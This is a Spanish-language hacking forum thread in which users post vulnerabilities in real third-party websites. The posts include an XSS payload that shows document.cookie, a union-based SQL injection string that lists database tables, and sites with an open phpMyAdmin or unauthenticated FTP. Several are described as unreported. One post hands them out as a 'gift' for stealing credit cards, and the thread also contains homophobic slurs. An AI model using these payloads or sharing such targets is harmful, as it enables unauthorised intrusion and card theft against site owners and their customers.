Web: [Enlace externo eliminado para invitados]
Bug: XSS
Prueba: Pengen esto

Código: Seleccionar todo

<script>alert('Anda,mira una cookie:\n'+document.cookie)</script>
y denle al boton .

-Saludos-
Muchos bugs reportados fueron descubiertos por Navi_terrible y D4nb4r y aqui aparecen otros como que los descubrieron ellos... yo tambien soy parte de Safety last group y de Mandrake security.

mas detalles: [Enlace externo eliminado para invitados]

Mas detalles para quienes duden:
[Enlace externo eliminado para invitados]

Ser sinceros no cuesta nada...
Saludos
Siempre por aqui
f3rn@ndo escribió:Muchos bugs reportados fueron descubiertos por Navi_terrible y D4nb4r y aqui aparecen otros como que los descubrieron ellos... yo tambien soy parte de Safety last group y de Mandrake security.

mas detalles: [Enlace externo eliminado para invitados]

Mas detalles para quienes duden:
[Enlace externo eliminado para invitados]

Ser sinceros no cuesta nada...
Saludos

Poner los autores reales, no sean maricones, arriba mandrake, ahora ando muy ocupado y no tengo mucho contacto con danbar, pero ya hablaremos de próximas charlas junto a él.. ya tenemos alguna prevista pero falta confirmación por otro lado..
Skillmax escribió:
f3rn@ndo escribió:Muchos bugs reportados fueron descubiertos por Navi_terrible y D4nb4r y aqui aparecen otros como que los descubrieron ellos... yo tambien soy parte de Safety last group y de Mandrake security.

mas detalles: [Enlace externo eliminado para invitados]

Mas detalles para quienes duden:
[Enlace externo eliminado para invitados]

Ser sinceros no cuesta nada...
Saludos

Poner los autores reales, no sean maricones, arriba mandrake, ahora ando muy ocupado y no tengo mucho contacto con danbar, pero ya hablaremos de próximas charlas junto a él.. ya tenemos alguna prevista pero falta confirmación por otro lado..
avisame skillgay q ya saves q toy dispuesto pa darle duro
Imagen
Muchos bugs reportados fueron descubiertos por Navi_terrible y D4nb4r y aqui aparecen otros como que los descubrieron ellos... yo tambien soy parte de Safety last group y de Mandrake security.

mas detalles: [Enlace externo eliminado para invitados] ... en-en.html

Mas detalles para quienes duden:
[Enlace externo eliminado para invitados] ... st%20Group

Ser sinceros no cuesta nada...
Saludos
Eso va,por el post mio?

-Saludos-

PD:Si es asi,sorry ,no sabia que hubiese que poner el autor y tal.
tranquilos un abrazo para todos, si hace tiempo que formo parte de mandrake y safety, tengo una profunda amistad con navi y d4n.
espero tener la de ustedes tambien.
Pero eso si nombren a mis amigos
saludos
Siempre por aqui
Reporto un pequeño agujero en el distribuidor avira para argentina

[Enlace externo eliminado para invitados]

Imagen


espero lo disfruten.. los creditos ya saben... Islam-47 Y SLG
Siempre por aqui
Perdón, pero encontré XSS en rapidtrend..
BUG: [Enlace externo eliminado para invitados] ... /script%3E
....
Y si hacemos un DOM XSS?
Noticia: 51mpl3x dice que si fuera chica, se casaría conmigo. (1/Agosto/2011 at 5:52 pm)
Esperandote verte diciendo que eres gay no seas malito y pasate unas fotos ¿si?
Perdón, pero encontré XSS en rapidtrend..
BUG: [Enlace externo eliminado para invitados]<!-- inyección -->&search=Search
Web: [Enlace externo eliminado para invitados]
Tipo: XSS
Descubridor: Endjureuk
Panel:
Sugerencias: Pueden robar cookies, o lanzarse a algo más divertido, ético y emocionante :)
Noticia: 51mpl3x dice que si fuera chica, se casaría conmigo. (1/Agosto/2011 at 5:52 pm)
Esperandote verte diciendo que eres gay no seas malito y pasate unas fotos ¿si?
Aquí tienen un regalito, podrán comprar y robar tarjetas de crédito
-------------------------------------------------------------------------------------------------------
Web: [Enlace externo eliminado para invitados]
Método: SQL injection
Bug: [Enlace externo eliminado para invitados]
Inyección recomendada: -1+union+select+1,2,3,group_concat(table_name)+from+information_schema.tables--
Comentarios: Sin reportar, sin defacear, justo para ustedes, porque a mi no me gusta hacer deface (No me gusta tanto, me gusta, pero no tanto)

-----------------------------------------------------------------------------------------------------------
Método: PhpMyAdmin no-password
Bug: [Enlace externo eliminado para invitados] ... ex.php.htm
Comentarios:

--------------------------------------------------------------------------------------------------------------
Bug: [Enlace externo eliminado para invitados]
Método: FTP sin autenticar.
Comentarios:

---------------------------------------------------------------------------------------------------------------
Página: [Enlace externo eliminado para invitados]
Método: SQLi
Bug: [Enlace externo eliminado para invitados]
Comentarios: Super owneo, sin avisar, sin defacear
----------------------------------------------------------------------------------------------------------------
Página: [Enlace externo eliminado para invitados]
Bug: [Enlace externo eliminado para invitados]
Método: SQLi
Comentarios: ¿Cómo inyectarle? en cat=1 o en scat1=1, dónde quieras

Ya me cansé de reportar!!
Descubridor: Endjureuk
Noticia: 51mpl3x dice que si fuera chica, se casaría conmigo. (1/Agosto/2011 at 5:52 pm)
Esperandote verte diciendo que eres gay no seas malito y pasate unas fotos ¿si?
Metal_Kingdom escribió:Avira OWNED!! pobres, no tienen suficiente con que les jodamos el antivirus
no es la de antivirus jajaj es la de una asoacion de vida jajaj
Imagen

Volver a “Auditoria Web”